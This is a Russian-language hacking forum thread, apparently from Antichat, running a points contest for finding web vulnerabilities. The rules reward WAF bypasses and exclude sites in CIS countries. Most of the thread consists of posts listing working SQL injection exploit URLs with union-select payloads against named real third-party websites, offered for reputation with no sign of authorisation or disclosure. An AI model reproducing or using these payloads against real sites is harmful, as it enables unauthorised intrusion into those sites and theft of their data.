![]() |
Правила:
Ваша задача найти уязвимости в веб-приложениях. Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ). Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться. За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua). В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например: Цитата:
Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ Типы уязвимостей:
|
Буду первым. Если что не так подправьте
Site: dkcity.com Уязвимость: SQL Injection Эксплоит: Код:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5Уязвимость: SQL Injection Эксплоит: Код:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7 |
Цитата:
P. S. активнее, ребят |
А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
|
|
Да, тулзой кручу.
Сайт: theatreinchicago.com Уязвимость: SQL Injection Эксплоит: Код:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8Уязвимость: SQL Injection Эксплоит: Код:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0Уязвимость: SQL Injection Эксплоит: Код:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]Уязвимость: SQL Injection Эксплоит: Код:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20Уязвимость: SQL Injection Эксплоит: Код:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1Уязвимость: SQL Injection Эксплоит: Код:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5Уязвимость: SQL Injection Эксплоит: Код:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19Уязвимость: SQL Injection Эксплоит: Код:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivoУязвимость: SQL Injection Эксплоит: Код:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1Уязвимость: SQL Injection Эксплоит: Код:
http://eu.bosscom.com/product.asp?id=[t] |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
| Время: 16:35 |